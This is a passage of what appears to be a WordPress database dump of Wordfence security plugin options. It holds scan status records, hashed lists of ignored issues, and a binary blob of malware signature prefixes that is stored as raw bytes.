07:12:53PM\";s:2:\"IP\";s:14:\"213.226.141.77\";}','yes'),('showWfCentralUI','1','yes'),('totalScansRun','100','yes'),('wfKillRequested','0','no'),('currentCronKey','','yes'),('scanMonitorLastAttemptMode','quick','yes'),('scanMonitorRemainingResumeAttempts','2','yes'),('scanMonitorLastAttempt','1704989101','yes'),('scanMonitorLastAttemptWasFork','','yes'),('scanAjaxTestSuccessful','1','yes'),('scanMonitorLastSuccess','1704989104','yes'),('wf_scanRunning','','yes'),('wf_scanLastStatusTime','0','yes'),('wfPeakMemory','91226112','no'),('wfScanStartVersion','6.4.2','yes'),('lowResourceScanWaitStep','','yes'),('wfStatusStartMsgs','a:2:{i:0;s:0:\"\";i:1;s:0:\"\";}','yes'),('wf_summaryItems','a:8:{s:12:\"scannedPosts\";i:0;s:15:\"scannedComments\";i:0;s:12:\"scannedFiles\";i:0;s:14:\"scannedPlugins\";i:0;s:13:\"scannedThemes\";i:0;s:12:\"scannedUsers\";i:0;s:11:\"scannedURLs\";i:0;s:10:\"lastUpdate\";i:1704989104;}','yes'),('scanStageStatuses','a:11:{s:13:\"spamvertising\";a:4:{s:6:\"status\";s:7:\"premium\";s:7:\"started\";i:0;s:8:\"finished\";i:0;s:8:\"expected\";i:0;}s:4:\"spam\";a:4:{s:6:\"status\";s:7:\"premium\";s:7:\"started\";i:0;s:8:\"finished\";i:0;s:8:\"expected\";i:0;}s:9:\"blacklist\";a:4:{s:6:\"status\";s:7:\"premium\";s:7:\"started\";i:0;s:8:\"finished\";i:0;s:8:\"expected\";i:0;}s:6:\"server\";a:4:{s:6:\"status\";s:16:\"complete-success\";s:7:\"started\";i:5;s:8:\"finished\";i:5;s:8:\"expected\";i:5;}s:7:\"changes\";a:4:{s:6:\"status\";s:16:\"complete-warning\";s:7:\"started\";i:2;s:8:\"finished\";i:2;s:8:\"expected\";i:2;}s:6:\"public\";a:4:{s:6:\"status\";s:16:\"complete-success\";s:7:\"started\";i:2;s:8:\"finished\";i:2;s:8:\"expected\";i:2;}s:7:\"malware\";a:4:{s:6:\"status\";s:16:\"complete-warning\";s:7:\"started\";i:2;s:8:\"finished\";i:2;s:8:\"expected\";i:2;}s:7:\"content\";a:4:{s:6:\"status\";s:16:\"complete-success\";s:7:\"started\";i:3;s:8:\"finished\";i:3;s:8:\"expected\";i:3;}s:8:\"password\";a:4:{s:6:\"status\";s:16:\"complete-success\";s:7:\"started\";i:1;s:8:\"finished\";i:1;s:8:\"expected\";i:1;}s:13:\"vulnerability\";a:4:{s:6:\"status\";s:16:\"complete-warning\";s:7:\"started\";i:1;s:8:\"finished\";i:1;s:8:\"expected\";i:1;}s:7:\"options\";a:4:{s:6:\"status\";s:16:\"complete-success\";s:7:\"started\";i:2;s:8:\"finished\";i:2;s:8:\"expected\";i:2;}}','no'),('scanTime','1704989104.2812','yes'),('lastAttackDataSendTime','1705066249.882334','yes'),('lastAttackDataSendId','15758','yes'),('emailedIssuesList','a:65:{i:0;a:2:{s:7:\"ignoreC\";s:32:\"6417e8b2f287804eb64eec740fcabf24\";s:7:\"ignoreP\";s:32:\"6417e8b2f287804eb64eec740fcabf24\";}i:1;a:2:{s:7:\"ignoreC\";s:32:\"6aa793bcb807afc4994aa1e9be548f6e\";s:7:\"ignoreP\";s:32:\"6aa793bcb807afc4994aa1e9be548f6e\";}i:2;a:2:{s:7:\"ignoreC\";s:32:\"e18463665ca41950a8d87ccb998d3f9f\";s:7:\"ignoreP\";s:32:\"e18463665ca41950a8d87ccb998d3f9f\";}i:3;a:2:{s:7:\"ignoreC\";s:32:\"31ccbbeeec5c3f86553b519240d62eac\";s:7:\"ignoreP\";s:32:\"31ccbbeeec5c3f86553b519240d62eac\";}i:4;a:2:{s:7:\"ignoreC\";s:32:\"0a527580171d7baeaedb5e6b8d853d04\";s:7:\"ignoreP\";s:32:\"0a527580171d7baeaedb5e6b8d853d04\";}i:5;a:2:{s:7:\"ignoreC\";s:32:\"e206c65c5dc9ed530c13d6e85637a0a0\";s:7:\"ignoreP\";s:32:\"e206c65c5dc9ed530c13d6e85637a0a0\";}i:6;a:2:{s:7:\"ignoreC\";s:32:\"92c7cf52d3106554f43f89cda256549b\";s:7:\"ignoreP\";s:32:\"92c7cf52d3106554f43f89cda256549b\";}i:7;a:2:{s:7:\"ignoreC\";s:32:\"972b967996886e808417023a2f21b2e2\";s:7:\"ignoreP\";s:32:\"972b967996886e808417023a2f21b2e2\";}i:8;a:2:{s:7:\"ignoreC\";s:32:\"df739b3d4fb40159f36e13be4d75095d\";s:7:\"ignoreP\";s:32:\"df739b3d4fb40159f36e13be4d75095d\";}i:9;a:2:{s:7:\"ignoreC\";s:32:\"053fd33b41193d042f65041475cdea68\";s:7:\"ignoreP\";s:32:\"053fd33b41193d042f65041475cdea68\";}i:10;a:2:{s:7:\"ignoreC\";s:32:\"2f180100c963ee67d3fdc600b9ece1a9\";s:7:\"ignoreP\";s:32:\"2f180100c963ee67d3fdc600b9ece1a9\";}i:11;a:2:{s:7:\"ignoreC\";s:32:\"4dc9ac4632580e58a690b13aa399e2e7\";s:7:\"ignoreP\";s:32:\"4dc9ac4632580e58a690b13aa399e2e7\";}i:12;a:2:{s:7:\"ignoreC\";s:32:\"57a39969be4aacae89ce747b18c28b66\";s:7:\"ignoreP\";s:32:\"e25e450ed62862447a6f7ba2e999d861\";}i:13;a:2:{s:7:\"ignoreC\";s:32:\"4be0892c26e0d06fee3bcf2ed5cf4c27\";s:7:\"ignoreP\";s:32:\"175b0e4fe8b4a62c59dbd8bde0d27ccf\";}i:14;a:2:{s:7:\"ignoreC\";s:32:\"305ea2608b0f9539fac99ac6d82d2f36\";s:7:\"ignoreP\";s:32:\"f9f3c6515d61402069dffbd865d3e4de\";}i:15;a:2:{s:7:\"ignoreC\";s:32:\"b4423c58e807f0c267948d3031f4fba6\";s:7:\"ignoreP\";s:32:\"f130c617d3530b63398dfa10cd00073b\";}i:16;a:2:{s:7:\"ignoreC\";s:32:\"da451bc4cef8e36191eb6b40b16b290c\";s:7:\"ignoreP\";s:32:\"6a8d3282b5fcba86922f78c312f961f7\";}i:17;a:2:{s:7:\"ignoreC\";s:32:\"6d18352c1df8abd61497c952fcbf8cd5\";s:7:\"ignoreP\";s:32:\"d77218eb4588c03227c063fe7242dae9\";}i:18;a:2:{s:7:\"ignoreC\";s:32:\"7885e84bc882561167dc042e66a4745e\";s:7:\"ignoreP\";s:32:\"9897e0a4518fb661da3d245e7dc7b9c4\";}i:19;a:2:{s:7:\"ignoreC\";s:32:\"93967150dffce259d9ae01c24afd1bc1\";s:7:\"ignoreP\";s:32:\"022cbd3cc1ccc4444ae9fcd882e10093\";}i:20;a:2:{s:7:\"ignoreC\";s:32:\"5e80b204299976ef05d9ca66d75e1831\";s:7:\"ignoreP\";s:32:\"ff828e58c57762e700a6defbb05e9090\";}i:21;a:2:{s:7:\"ignoreC\";s:32:\"072f36186706c1d78aa36e8fb70db964\";s:7:\"ignoreP\";s:32:\"0ca8e195603621935a4c0fffd2087753\";}i:22;a:2:{s:7:\"ignoreC\";s:32:\"7edbb6a68d22a21268a40610a82ca2f6\";s:7:\"ignoreP\";s:32:\"7edbb6a68d22a21268a40610a82ca2f6\";}i:23;a:2:{s:7:\"ignoreC\";s:32:\"80f0893d52bb2cdde939789de64ef0ec\";s:7:\"ignoreP\";s:32:\"80f0893d52bb2cdde939789de64ef0ec\";}i:24;a:2:{s:7:\"ignoreC\";s:32:\"47000426ae830ac607f21a55c0629e91\";s:7:\"ignoreP\";s:32:\"47000426ae830ac607f21a55c0629e91\";}i:25;a:2:{s:7:\"ignoreC\";s:32:\"67f586565ca76d63184c967b6d87de2a\";s:7:\"ignoreP\";s:32:\"67f586565ca76d63184c967b6d87de2a\";}i:26;a:2:{s:7:\"ignoreC\";s:32:\"6cd0d97c1d3a44489569e94abe19a9d3\";s:7:\"ignoreP\";s:32:\"6cd0d97c1d3a44489569e94abe19a9d3\";}i:27;a:2:{s:7:\"ignoreC\";s:32:\"246cfe6efb59d0cc593119d0aafc00d5\";s:7:\"ignoreP\";s:32:\"246cfe6efb59d0cc593119d0aafc00d5\";}i:28;a:2:{s:7:\"ignoreC\";s:32:\"8fc0966cff834ae9e48ef65a3c2b1851\";s:7:\"ignoreP\";s:32:\"8fc0966cff834ae9e48ef65a3c2b1851\";}i:29;a:2:{s:7:\"ignoreC\";s:32:\"a5da0d0cabcaf0156f581ca5d29e967d\";s:7:\"ignoreP\";s:32:\"a5da0d0cabcaf0156f581ca5d29e967d\";}i:30;a:2:{s:7:\"ignoreC\";s:32:\"0925ba124b5b248fe315472d66e83317\";s:7:\"ignoreP\";s:32:\"0925ba124b5b248fe315472d66e83317\";}i:31;a:2:{s:7:\"ignoreC\";s:32:\"b351d28c5b747dfd49de0beb38d9c962\";s:7:\"ignoreP\";s:32:\"b351d28c5b747dfd49de0beb38d9c962\";}i:32;a:2:{s:7:\"ignoreC\";s:32:\"1af7c1e0e51edbf02f89642dbf822da7\";s:7:\"ignoreP\";s:32:\"1af7c1e0e51edbf02f89642dbf822da7\";}i:33;a:2:{s:7:\"ignoreC\";s:32:\"a66ce0d552b1191cc0dd52f460ccaf3f\";s:7:\"ignoreP\";s:32:\"a66ce0d552b1191cc0dd52f460ccaf3f\";}i:34;a:2:{s:7:\"ignoreC\";s:32:\"4b98830bbfdd996049cdbfa660a1669b\";s:7:\"ignoreP\";s:32:\"4b98830bbfdd996049cdbfa660a1669b\";}i:35;a:2:{s:7:\"ignoreC\";s:32:\"33b1d2fe2369a7dbc33f56f1e3e51dc4\";s:7:\"ignoreP\";s:32:\"33b1d2fe2369a7dbc33f56f1e3e51dc4\";}i:36;a:2:{s:7:\"ignoreC\";s:32:\"195fc3baac81a036d0c722b5589f4b39\";s:7:\"ignoreP\";s:32:\"195fc3baac81a036d0c722b5589f4b39\";}i:37;a:2:{s:7:\"ignoreC\";s:32:\"4751b3bbc6e48adb7aff1c8e5cbbaf9c\";s:7:\"ignoreP\";s:32:\"4751b3bbc6e48adb7aff1c8e5cbbaf9c\";}i:38;a:2:{s:7:\"ignoreC\";s:32:\"962ca146deaa733dd04b581803c4d074\";s:7:\"ignoreP\";s:32:\"962ca146deaa733dd04b581803c4d074\";}i:39;a:2:{s:7:\"ignoreC\";s:32:\"971cffa32c57ca06234237931adec861\";s:7:\"ignoreP\";s:32:\"971cffa32c57ca06234237931adec861\";}i:40;a:2:{s:7:\"ignoreC\";s:32:\"e907bd492e370422a1134edfc2916668\";s:7:\"ignoreP\";s:32:\"e907bd492e370422a1134edfc2916668\";}i:41;a:2:{s:7:\"ignoreC\";s:32:\"6b019e6f2e745939d3043f2c427057d6\";s:7:\"ignoreP\";s:32:\"6b019e6f2e745939d3043f2c427057d6\";}i:42;a:2:{s:7:\"ignoreC\";s:32:\"acefaa93f47b24ea4f25e6204427f461\";s:7:\"ignoreP\";s:32:\"acefaa93f47b24ea4f25e6204427f461\";}i:43;a:2:{s:7:\"ignoreC\";s:32:\"d48775e93e3ca0643e92177daa356b0d\";s:7:\"ignoreP\";s:32:\"d48775e93e3ca0643e92177daa356b0d\";}i:44;a:2:{s:7:\"ignoreC\";s:32:\"b613e0af40b14b9631fec6d7d2dc3a9a\";s:7:\"ignoreP\";s:32:\"b613e0af40b14b9631fec6d7d2dc3a9a\";}i:45;a:2:{s:7:\"ignoreC\";s:32:\"a9ef53d149ef60d340d7b5abf2dab8fb\";s:7:\"ignoreP\";s:32:\"a9ef53d149ef60d340d7b5abf2dab8fb\";}i:46;a:2:{s:7:\"ignoreC\";s:32:\"9749cb43546ac32b251d7edf961147d4\";s:7:\"ignoreP\";s:32:\"9749cb43546ac32b251d7edf961147d4\";}i:47;a:2:{s:7:\"ignoreC\";s:32:\"32e7422e1a5ac94c880559c868c3b19e\";s:7:\"ignoreP\";s:32:\"32e7422e1a5ac94c880559c868c3b19e\";}i:48;a:2:{s:7:\"ignoreC\";s:32:\"4b9fdc43cd513321d9b003307b751061\";s:7:\"ignoreP\";s:32:\"4b9fdc43cd513321d9b003307b751061\";}i:49;a:2:{s:7:\"ignoreC\";s:32:\"064e9f5c0625994b6b245c17444cef68\";s:7:\"ignoreP\";s:32:\"064e9f5c0625994b6b245c17444cef68\";}i:50;a:2:{s:7:\"ignoreC\";s:32:\"fd9700710658d93704e02c616d0f4595\";s:7:\"ignoreP\";s:32:\"fd9700710658d93704e02c616d0f4595\";}i:51;a:2:{s:7:\"ignoreC\";s:32:\"0f084ded427f634674aa221732be523f\";s:7:\"ignoreP\";s:32:\"0f084ded427f634674aa221732be523f\";}i:52;a:2:{s:7:\"ignoreC\";s:32:\"e65112e16e1b5f628662489afa24cdf9\";s:7:\"ignoreP\";s:32:\"e65112e16e1b5f628662489afa24cdf9\";}i:53;a:2:{s:7:\"ignoreC\";s:32:\"a2ce136e2b11fc1552d01aace19dd3c0\";s:7:\"ignoreP\";s:32:\"a2ce136e2b11fc1552d01aace19dd3c0\";}i:54;a:2:{s:7:\"ignoreC\";s:32:\"f4b416a55c4f1071b7407bbffa5e123a\";s:7:\"ignoreP\";s:32:\"f4b416a55c4f1071b7407bbffa5e123a\";}i:55;a:2:{s:7:\"ignoreC\";s:32:\"83b170ca0e63f0e97e19a1774a539d6e\";s:7:\"ignoreP\";s:32:\"83b170ca0e63f0e97e19a1774a539d6e\";}i:56;a:2:{s:7:\"ignoreC\";s:32:\"b2c07141773a990f909314283f7fec0c\";s:7:\"ignoreP\";s:32:\"b2c07141773a990f909314283f7fec0c\";}i:57;a:2:{s:7:\"ignoreC\";s:32:\"fe36850fba6c330d58865b615ea58776\";s:7:\"ignoreP\";s:32:\"fe36850fba6c330d58865b615ea58776\";}i:58;a:2:{s:7:\"ignoreC\";s:32:\"247227371b9a0cd981505be3e6a6450d\";s:7:\"ignoreP\";s:32:\"247227371b9a0cd981505be3e6a6450d\";}i:59;a:2:{s:7:\"ignoreC\";s:32:\"99032573fc07430909bfb3f29f86f8a9\";s:7:\"ignoreP\";s:32:\"06decfc335ae6810be56a34d7ee6a4ec\";}i:60;a:2:{s:7:\"ignoreC\";s:32:\"99032573fc07430909bfb3f29f86f8a9\";s:7:\"ignoreP\";s:32:\"86af3d1ee3fd25fcf64ccf30b7a4d117\";}i:61;a:2:{s:7:\"ignoreC\";s:32:\"16cf65a01d835e6b07aff9687c2a54d4\";s:7:\"ignoreP\";s:32:\"30b3ce91f20353ffae329b941fa5939b\";}i:62;a:2:{s:7:\"ignoreC\";s:32:\"fcaeed4e6eeeb61d49b7a9d1a9cd724e\";s:7:\"ignoreP\";s:32:\"be97f270c2873706288925fcf5f7ed9e\";}i:63;a:2:{s:7:\"ignoreC\";s:32:\"fcaeed4e6eeeb61d49b7a9d1a9cd724e\";s:7:\"ignoreP\";s:32:\"4b4656c08df3bed21e28a0b25ce32a27\";}i:64;a:2:{s:7:\"ignoreC\";s:32:\"d17470886aa767fffd28c7047f24bf57\";s:7:\"ignoreP\";s:32:\"d17470886aa767fffd28c7047f24bf57\";}}','yes'),('lastFalsePositiveSendTime','1694096749','yes'),('originalScheduledScanStart','1704984000','yes'),('lastScheduledScanStart','1704985257','yes'),('malwarePrefixes','\0\0\0\0\0\0y8\0ٗΝ;˽sIYJBR$RI%QDZHJ!I+JHi!*)EE+&~yy33>nj\no>^\'_wBx1uO\Z %e\r?EC)M>8)}uׄ-X1ffm\0\0\0ra?\0xG7\0?)`\04DK@b H \0Y+ gZ\0p\Z\0@1 Pt180\0v6. ); ռ\Z@U {\0u\' @p_F\\q4\0Z.=_\r0h t&:A!\0]߀\n@7\0b?g] ;al`,[0` `x,0`00a $`d0ZU\\\0>K>&)/S5);0r= 7?`\\C`9*XXՐd`~`6L XK֗_W6$`tt/<$p87O\0`m0m.V!kH,\Z Hf~ x89u6~ \\\\`w<:`^s0\0,?\0,H{\r,8,(N\0\\Y\0,x,x\0c OӀg#`-u७xxs/]\0,%| l 0,Yg8`р]C\'v\0k܀\0& `O,: X&\"@`H h4 8Z ܁s`I\Z0XӺٛA@XPv/6\"J b\Z \"k\0X:\0Q U5d DG]\06=] lnX[V@.E$.-ض,; ~j >Nu灄@B#8H7H|;؁.v+$ i?s +\n ؍,v4{f7go`>w`^`_N` R<)A=qR M6f0\nH/\02K g; c\"9P0%kӢ@D g= 3pdQ!p4pY@zs pN\Z\nt_Tp[B@Ipm\Z=(n1\Z Y\Z {{%\'F|\0*^&)@(2(OR˧w&W\0`m=P2@k@F : P}|7:S[9Z] rә\05Gf6\0|}E$p@xxx82/4htxt8S4πcÀQG^@6y <xaj\rxi9x9Y ^^Kږmb൷=:$ x1x;r)Юc\r |hK:́O|ϻu/o]#[?@@=\r_ǾU 7c\"oN)0 KK 4M?Ч |c@ĺ Dh-/1\'qĝxx6$/E.8(Z;] ˢ@@k@$P2[߀2hPu:HDT3@f\'{ GܺP\0UAUR\0 ~P-En8Uj饁ZZ|AM~!U j? j?{*\r:A-vpp)8DWZ;@Wh84- zq 8l0p4N\r_[\rp?8X\Z}M\0]A;A @8.8\Z\\ }Z м {*gpb 8\0h9v>hh5JN\0@kh\rh}lmN^m AoE/@;~U8i?>&/\'?O\0|D@@\'pZz!<8=]#~3g3G35\r+GYnn_A!8XyE\r$%!o==Ꟁgp\0/yhApQ\ZK:R..n烾K=GKTk eWd+OW|7]W>G0آ4W]\0WX {0? ^ Xuǀ#߂!Mu+>oQ>3F4\0^5 > F>n\\]< \r\npLp+Vf=u7m2p[Wpۉ}\'0nb\0I`’,p;Ll6GX)&\n&?w}H{{=\0߯*Sx-e`ڑ+`r0\r>hxpD0[=*p灇^\0R lUݞ\0\0s1c/U`\"38_R\n̛\0512 y6X,<x9*XX,`3%OMY+s<&<\r,60K@0<0lXe3JB0+.+g)7gxyE\\H+FEWo?E<kC9u5, ޮowuw^Ƹ\'Р >\nj\0}qw=`S=-{(\'oi$l-#g/_$//Ԃ+W?u\0 sߵz{^Cct<1<\0 vmONsۧO/ ~ U>}8X v]:X\nv{D{N?1bo2_WvW u6\Z# ?࿲0k;W; 47Cp #\n{0\0v|!b9.y  l1m#!r\'\Z\n!ѼXH%:+!驫[Hfɾ\\SŐ-D\ri\'!h)1Rj/w, ά! ?H0 VG!a$49 wA4_HG{ O\r\rt<{\r˟}Wwo@CAܞA|AJa Â+Ј5Yrh#\Z\n2%!Fi-F F\'L4Bcd%И+ 3dȜ\"]-8$Ȳp*dYBV@\'C,t $dmMX k ErHQBsSiِhڪ7ȹ;l\0\0M\'Ch.ճr]=rr}5*=$4O_< -<C $IxAs]4hBo3h=Z4|=+Sȫv\'yZCKA[C[w|,=I$03J9\0%\nmjЎ(ɴJ%m/%\n%_vM\n q OA)g_@)/ڠTq%tV O|\0L \neAfYP(9Opy(kHkCG8tditȓ(g{k _\r?~ʷ̀#G@CwC\'_ YЉ[*Z j} BCE T9*>* Ag\n~CŊPq*?*)̂JNι*swCcʠp|7tT2TAWA3%/ t UM_Uqn] ]MBGk kC5\rPGtscLX9\0i: :׮ݏzj =5n\'BO@@uPw j3%Yk\rzMzmrԾ9zq eԑiu\nuz:ʠOZ~MЗoзFNr u{_ks3zPoUsmgaWA{пlFa4q0zm`Fuw`&/Är܂I`L( [KM%\'Kɰ,\ne?a:*_F7`e V&0C`Ns`˰qXX ΰt5, 4\ZdXCk:\"u|&:mPx}>! ]{C0<6t><\04\0 9\r`Ol\\k |MY^$6wh-V6k`E x|=غlS4m6¶_Rėn>~!<9v};\\4\rSoiӪ_ӞR(y\rعB?] *q gN\r0gfngnR`bxNxѹW?x}x[.|t}F$qx\r0PxCexxYjxY+OoU \rKag\r\0^Yp ژÁk\Z`>޸^=E}Aap[mሳYpy1 #oQ3]8t11l!ǂ;x[(x6sy\0ǏW-__;hxǑpҴhx\'>v#y;8x_{TISqkC74[ N[_no[\r s78c6g gfK:#M>Q>z>f>LyGpޣp \"\n>p>> , ;§N]YE\"H̰ٚ mK..Yu.9>r|<.cS\rp!pm\\u!|1Z%&g.|\rµpv-#62ckqku.sWe?q<m@>n7oÏVMZǧOfͻg5w~Q9n=L/=W+W?UH^]-߫w6XF;~)o5x*oMgwr\roww?6{\Z=s1ý:˫_#_\'?^K#_p?[<\0>\"@n>7So#h}=D^q!D<9\0ND$!/R 9!&MDu$BO#JaL}؊poG_ sWNDQGDxv\nѲhE ZmLDn_h\rD GtCt~5\"ŝoDDG 1{NF>@!!1 \\w1\n@֚\"F}v蟦}bڸ \'2f>bVeK& ^o ]\"u\'2[jX*G#g+ub %Ґu}\\daȤc+{{ 2eq{q(F!N:iayCc*|<q> qr q9}<^ 2Պ%Y[713\Z2j\"2B\Z2)23D﹇̯Z,x!a%gsx,ܾY!^o@#KjZ R}CdUC2h$gA +NBUYH*Yٽ \\ FmU?U 4(ІǝEOBVEV7CLđ5G )XN[֤#KA$Zdnnsd\"YTl\0h$:]qqG6Ȗ)ȶÑm)xj$$,Z$$$Ew7J$,$\rsٹ|\"{!{uW {#{?mF]@Sϐ> )\") \ZERCR7\"\" #i[ u$$sxиa.pb3uE: ٽ{޻ȱH6= !ybJ9y9YmiEhrr\0r&\n9S9k9;3rR<)EJ,s}P͡gHD8rI\\?\Z@>8B,[|)B@.B|ьF~h ހR7-4{>z}U@&; }KH3  _p o (\'\nu: Eʛ(\ZEk(tBq(YEŢش?ʮODB3PF/ e>c(ېr#PpTsd5ܨA<~Pq*T/2ߠzPRT7?F٨Aj-BCG OGIq:lLPfQCP B-] j5:\":7\"j\Z@\\Va7{e脕5cQ}cщ>N޲ ǡuPǙCQ:Tgixt=u)B]ζӱ2tz=x:Ctɖn[e;:Ξzu{ S΍[뚌|.0z {zT.=\rђ>Eo6 [rkDW4EЕ+=+`te>ڄJnDգo/;!cסޛѰ\'4|G,\Z]k]?-!x\ZI8\'E7\Zi.B7E7/1hlc95e\Z*G _ S_/[Sѝ5hLc4 %CwnE\r>}7no5w M1@SmBSXBSGѴ}Uh z0Vf|f@3բl|#\nѬ1uh֭hV4gM@s\"МX4e(a$zd4-E(F󲖡3t|h~4=qFOCOm@ X-ЎE ƬC NFOBO{FO?$%ZB0L\rZt -u-+G/eW\\޷UU aNh5rF+kk%{k_XzbZk֮qBoR^zv(Κ}}Wz?&\0}([>\\> hIa6GhmT>GuS3}Vb씢-wG9zOr\"5}5}e݇Z}}= }=Q(nrm\ZmcOtED?G;l G/c,v}B?߃~< \Z~iFjMF_DFF\rhuȣݣCsў/ץ FtBC!STo֍G@3\0RO0\ZcX{_~?\r#]0;vDyLl}0lLb`Ibw1نQyqS\Zĸ32/?jbNz-L}SaSO 5ibU0 Ssln{ Ӄ0?1WIHSlhB\"6,~\r6[fZ\r/_*F[O5/ ̴&c/k{663\Z[gTY,1lLl|-6a f3/f3f˿l1ۨ$66iYMYM)9ama7Ci6;2sHa?،#Y5 & ܨcn̝sgbs+ߞؼ7ؼo?6q)\0-hKea&] b+z!  tލ|5 |q |{[5e4 :\\g$Bta!X Lª`gᳱuغu؆ǽ؆g\r_]XXXtq>܄mmmN8m>t۲=ǶfZI\rXxp= KmaU*x;K%ݷvŒYlbplϔ5؞ؾIkLK=i.\'`ðX4,3x\rvh찏?e˺nebi4c܃;N-Ž:cľ*Xj+{2],~ GҰQY/,\\vZ?N#HoB,܇;q\0Gd5>d[\\Rz۾z{p6~]iB|>VGtōq~nnrt=>*<>D%>MOt`]8ռ͇|m,nm[؄p|l;|z\n0n0ggE\0O|Vw%>;\Z>7n ,>5>_e/y[/؏/|\n_qz{u^\Z0vƽ/V>ǃqOKR6|2\n)Skp\'^ʐx >_%_5z i^p_p4:}_ãOj{3Ou:u:ay| xuxd:~=~m0yc[j\\8519,~SӉߜo෿Xw5;Cs Cxpk!~oP,8 8e.x*o 𦵾xfiT7ݚ71,X??؅:l7[/q_xu-N\0qױq)t[W.ߗ<?<;|Ymz/϶3gS/Mg7_{,ook]\Z.gw6êqfk{7xoa\'i]>Պ~х?&[߁x_;*@1_r|A_G0Մ\0K)zw@?@v0N?Bh04\'-0!$d)Urw$&;Clg7p]| >b/*^Pe00y}\ZCh%7ڃf_w`b\"1xbh11DaC}%\ZD,aP3ZVSE \" ;NxK$#i[bH#CxUDv01!FFѫ>iHbEbLT\'aDX{NX|N~B|K/y\"a9O|OX~]IX|$񖫉 /1aA})% ΄nbʃ/ĔvC%ILwSSWN6#ӷQĴ g넳+\\H \'\\FU.%,1#p=1h&fE\"Y\'r 7I۳ۛɀpv\"܏% ĜpbT[ 6S/t]Nx$/cX<=XbA,~J,$|W|X*#f KK\"t; \")X9d\Z.lHk5ïk̈5 DR#\"$fO R:vXKl\\DDWQ?kE-Ħ@b Al>Nl2]1ݿZtضÜN=o&׉DEDd54̄H:<؅&vF#ݏ=6=SL\'܈+܉ډ)=Dc 688p-qLfHDF#yDzaՏ!8dHr\'`k\"4i#eܡ\'ZoDfs_<8DdcD#DѴD(\nBMgNYO܉xCܩ_AMcN\'Mk)}wr)`\n⡍-oQ7oL&\ZDC\"Q;Ԛh|YLӴoi7lKGt\'|Ӊw3DH@opG񻦛ӫE{}?~ӟS>1px.%/H ah.VZ 1q#q/AGWs$ 986rS$֏= B8I?#3?d\ZHvh)ɾBy$簞X\\i3:T!)4O}\Z9brNrd0r! iIi|c:i|k7iž\"MF&H2\'&וuGLf>O##GFndd/FFS(Kuȍ1h2:y4 #7JnOn*~FnlDƬLƴ-\'7;DnNYOƙ\"m$Jčdǟ5ɤ_dR73$ddr׶Nr7#&ɳBd-Εd=r9)@fUYdV+n\'SpJ\'\\t CcaiU{18Ml-&nM.Ko{\'kޓO=fY*lO6O Wo!zggg_Ed˟R;6d5|S|=|;||[n!\'ۯƐk5=ò0QD~6?D~N~9RJ~[]Fx]Mv?u&{r^h_JW=@Db?-ɿV{Ⱦɿ~(ˆ=\"pUR.dm\"TvPDL>\"Hlc.z+{k(|8QXFxKh\"fZuoD\"\"fע!;4!BDHޝ_\"g\"a\rEG&F:o;/2~/\ZA4vmhܰѢqwAxH\"\Z?\\#6!+yRHh4D)!٢WNjsg>>/0_+-x&:4Ht(c(B()T#dHmDGM\rEG:DG>rn!:(Q;щ(mQhpZQѲzQQP kDDJFJf΋DD*kEeVʂD凵EgBD3EDWfU&鋮nUD׮]PtnF#,Ɖn~28.݉4YEQvQCRhOQ讨)XT0A8K*zq5+5\'E/bE/^NX.jm,zy^z,j)z3hM[\n;4QǖD>/[(BїD䑢gEE]D7x(o}Q&߃6ѿbJ,F&UQ1(&]bQX%K˶eّblX],8-2X1\\?=ż\"dXFVGJTJggi֟#마w_>]\\,>(.*>e(.{G\\ء9nrnĥo։ƒC/}W *Wĉ/{/o._#R+ڔ ;!m-H|qqV[Cķwn9U|w(~P%~chq%\'nw7M7|7\nō[M:\'`q[73/_4:_ŭ6G-Ƈů7M;ix+ğx)kşdo[]wV{ {>6l ?:ſX&AK\Z$r .K%xc XB> !Z7HHiX\"\"~HD$[%bm=(]0A\n {Or(Qs d\"d2dІ\'FƝx[n6^D ]%C? [\"1I%n$>*IU%e+$e]\nT\\_RHrm^[o%wxS %u:5]{s%v~XwQ9I%vђےg%#s%ϯH^ yKbIɋˣ%\rݳ=씼,yIﳔ|0|^J>Ŭ|WK>7||&3HmHɷc$otkJzT;3K%?GI~<(m+*xzI\n٭BSl0u]I iT$KO$KeCRER/I^\\;-՚(ZuKmX:\"wtD?ȩ#äF¥&`tK:J!5t̆*kff{R/.WwJǎI:6P:Uj͍$ڴImg6<Hv߂FK\'ڏ#V,JS-BS[Jfܗ:eNi\rJg:*uv礳Gq)TJ88K=)C -FH̥ORdԻO)m,]v8P\')&K-\Z0ĤU6KZ&i9i\"i{4DV#\r,\rJCuIC#>H^nuF\Z}F:ҨS1^I7IMɔ҄;&H&WJw.]]\"mI?ɔ \\֔JWK3͐fՌfߴu =zwI]\\z3i*=5ll}ܺ򃷤cii\'T-TZ&!\'޻Kzփf;K}uqҺ{pޥpaNfG+\"5QƺҦ \'sNJߔ>Qi%i疑ofH_zIێJ_[%}kHvK̗߭~ ؽMy%BiZYK6Xua?T{ni_Ү\"eCi Fߕ/*!GڏG/2J ~$35>=LY=#[,wZf JGp|}h|lJ\'cH6mlIuled*@[BL6\'EF9XZ0{vw6bH\Z ÿɖo+m_ee\n<ܕ&;c(+\\ ;7gmم0Y KsWv.PvœUɮ jnzdw\'ꂞZeϔ=l {<]Dy[,)kt=KY\"k!\\e-]Ke!K쥱e -{YkW5uNx9r{Aܰ|-#o}Ms&GdMM5MKj f?7\'Qe,J[g\'x[wm,O r1/*w:yLq@>mE*rW?9rkssNF{/\Z*_tY[ܣ\'HbܳH(E_(s˾@uZ {K>/5ZxA|B||]N&}<7y9y#y<\"|yn|LGQ1Jq<:I_ 4w|t?|X~[X4#4Z\0 Зzޝ?*{OW.ם.=AeJ!\\\nPP\n_D/Ph=|\"Q)Ŕ8`<%$!JXJl)ٵ9Jn6@\r(AQ)HGQSӧC(.ŵPR\\K#(MbJ˚(7MXRCPC\\j\reuv5~e̖lć(;]X85e25eLM C9YH9lzSʩrEQ.))tEW_)o6wRNR[&(-s8X*tc9XDZATҦ[T#uʞu&ۥ={\"@Dظ:pԗJKϒP鯏S\rSQ#⨃Y?MTEe8Σ0=L:#6PzaT~\\JoN0:zak:1$:q7:;:Ǎ*z::c!Ux:6:s+u@yR%ڨeT)*~:UvzUʏQ?QFbsr uyU=j1uNFg:UfU$eQjQ ;Nv]^?Rꁣ.`\r!S Ѳj`E5G5U$RSӔԓɁSG\rLϗz^HHnBkt՞jj/QǨ7è7qꝎ.v 